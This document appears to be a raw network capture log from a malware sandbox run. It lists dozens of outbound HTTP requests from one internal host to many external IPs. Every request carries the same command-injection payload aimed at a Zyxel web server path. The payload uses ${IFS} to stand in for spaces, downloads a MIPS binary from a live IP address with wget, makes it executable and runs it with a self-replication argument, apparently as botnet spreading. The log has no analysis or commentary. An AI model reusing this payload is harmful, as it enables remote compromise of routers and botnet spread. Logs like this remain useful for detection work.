                                            Jan 14, 2024 15:50:31.267337084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2001192.168.2.235106083.165.201.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267368078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2002192.168.2.2334784142.95.127.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267383099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2003192.168.2.2356966160.59.24.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267422915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2004192.168.2.2345376117.210.186.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267433882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2005192.168.2.2339218136.228.66.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267474890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2006192.168.2.2353162160.33.111.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267492056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2007192.168.2.2355208120.111.185.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267543077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2008192.168.2.2359708197.218.50.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267560005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2009192.168.2.23345849.128.137.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267590046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2010192.168.2.2336230221.148.27.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267612934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2011192.168.2.2340094135.143.46.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267644882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2012192.168.2.235115034.217.45.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267663002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2013192.168.2.2340798101.139.210.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267724037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2014192.168.2.234087299.65.89.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267746925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2015192.168.2.2343416158.133.20.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267780066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2016192.168.2.23439825.45.151.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267806053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2017192.168.2.2349366169.59.78.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267841101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2018192.168.2.2353688204.43.51.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267860889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2019192.168.2.235679019.33.9.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267894030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2020192.168.2.233819694.212.3.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267921925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2021192.168.2.2349776199.207.8.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267925024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2022192.168.2.2341500108.240.177.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267956018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2023192.168.2.23428561.198.218.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268033028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2024192.168.2.233828476.36.47.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268049955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2025192.168.2.234628041.134.210.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268060923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2026192.168.2.2338812148.120.14.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268110037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2027192.168.2.2350436103.188.242.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268131971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2028192.168.2.2341962140.116.233.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268163919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2029192.168.2.2359978168.110.216.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268197060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2030192.168.2.2346622221.153.136.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268225908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2031192.168.2.2333724217.72.45.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268249989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2032192.168.2.2358686177.99.130.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268285990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2033192.168.2.2358396103.136.158.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268297911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2034192.168.2.234933073.197.132.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268341064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2035192.168.2.2354154178.169.70.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268373013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2036192.168.2.2334988110.159.248.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268393993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2037192.168.2.2347706181.211.4.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268430948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2038192.168.2.23445701.55.52.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268464088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2039192.168.2.2349154173.195.164.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268472910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2040192.168.2.233278275.240.234.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268506050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2041192.168.2.2345662103.25.149.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268548012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2042192.168.2.235925220.157.80.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268585920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2043192.168.2.2351278107.247.129.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268614054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2044192.168.2.2358704132.137.91.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268642902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2045192.168.2.235596478.97.178.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268675089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2046192.168.2.235464240.167.186.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268701077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2047192.168.2.2347470120.96.255.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268743992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2048192.168.2.2356584143.69.89.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268774033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2049192.168.2.234158461.65.253.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268795967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2050192.168.2.2341358200.50.65.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268834114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2051192.168.2.2356042167.68.108.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268872023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2052192.168.2.234485083.178.89.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268893003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2053192.168.2.233476259.198.56.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268913031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2054192.168.2.2355774149.53.37.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268954039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2055192.168.2.2354122133.241.113.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268956900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2056192.168.2.235433479.173.69.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.268975019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2057192.168.2.2339358188.42.72.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269026995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2058192.168.2.234317867.98.202.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269052982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2059192.168.2.2358876221.201.46.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269093037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2060192.168.2.234883264.132.227.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269114971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2061192.168.2.234026044.43.102.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269125938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2062192.168.2.235575084.63.99.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269185066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2063192.168.2.235577242.36.178.114443
                                            TimestampBytes transferredDirectionData
